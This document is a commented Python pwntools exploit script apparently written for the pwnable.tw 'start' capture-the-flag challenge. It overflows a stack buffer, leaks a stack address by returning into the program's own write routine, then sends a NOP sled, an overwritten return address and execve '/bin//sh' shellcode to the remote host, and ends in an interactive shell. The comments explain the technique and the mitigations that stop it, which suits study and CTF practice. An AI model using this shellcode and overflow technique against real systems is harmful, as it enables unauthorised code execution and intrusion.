from pwn import *
# Target selection: the local binary is commented out and the live challenge
# host is used instead; swap the two lines to run against "./start" locally.
#s = process("./start")
s = remote('chall.pwnable.tw',10000)
# Value written over the saved return slot by the first payload: a fixed
# (non-PIE) code address, so returning there re-runs the program's own
# "mov ecx,esp" and the write that follows it echoes stack contents back.
a_leak = p32(0x08048087) #0x08048087 <+39>: mov ecx,esp
# Older 23-byte variant kept for reference; not used.
#shell23byte = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# Stack-resident syscall shellcode (the path bytes "/bin//sh" are visible in
# the string).  NOTE: the name says 23 bytes but this string is 21 bytes long;
# pwn() appends it after fixed-size padding, so only its position matters.
# This whole approach depends on an executable stack and a fixed code
# address -- NX, PIE, or a stack canary each break it, which is why those
# mitigations are the standard defence against this class of bug.
shell23byte = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
# Extra adjustment added to the leaked stack value in leak(); 0 by default.
buf = 0
def leak(buf):
    """Obtain a stack address from the target via the a_leak return.

    Sends 20 bytes of filler followed by ``a_leak`` so the program returns
    into its own echo code, then reads the reply and interprets the first
    4 bytes after the prompt as a little-endian stack address.

    Args:
        buf: extra offset added to the leaked value (the caller passes the
            module-level ``buf``, which is 0).

    Returns:
        int: leaked value + 20 + ``buf``; pwn() uses it as the address the
        overwritten return slot will jump to.
    """
    # "chuoi" is Vietnamese for "string".  Read the banner up to the ':'.
    chuoi = s.recvuntil(":")
    print chuoi
    # Manual checkpoint so the operator can inspect output between steps.
    a = raw_input("Press any key")
    # 20 bytes of filler reach the saved return slot (same offset used in
    # pwn()); a_leak then overwrites that slot.
    payload1 = "a"*20+a_leak
    s.send(payload1)
    print "sent: ",payload1
    chuoi = s.recv(200)
    # The program prints its prompt again before the echoed stack bytes;
    # strip the prompt and keep the next 4 bytes.
    addr = chuoi.replace("Let's start the CTF:","")[0:4]
    # +20 is the distance from the leaked value to the NOP pad that follows
    # the return slot in payload2 -- tied to that payload's layout and to
    # where the second read lands; confirm against the binary if changed.
    addr = u32(addr) + 20 + buf
    print "address shell: ",hex(addr)
    return addr
def pwn(addr):
    """Send the second payload: NOP filler, return address, NOP pad, shellcode.

    Layout is 20 bytes of NOP (same offset as in leak()), the 4-byte ``addr``
    overwriting the return slot, 12 NOPs as a landing pad, then
    ``shell23byte`` (21 bytes despite its name).

    Args:
        addr: stack address to place in the return slot, normally the value
            returned by leak().
    """
    payload2 = '\x90'*20 + p32(addr) + "\x90"*12 +shell23byte
    # Manual checkpoint before the second send.
    a = raw_input("Press any key")
    # sendline appends a newline, so one extra byte follows the shellcode.
    s.sendline(payload2)
    print "sent: ",payload2
# Driver: leak the stack address, wait, send the second payload, then hand
# the connection to the operator.
addr = leak(buf)
pause(2)  # pwntools pause(n): sleep n seconds before the next step
pwn(addr)
pause(2)
s.interactive()  # interactive session on the remote socket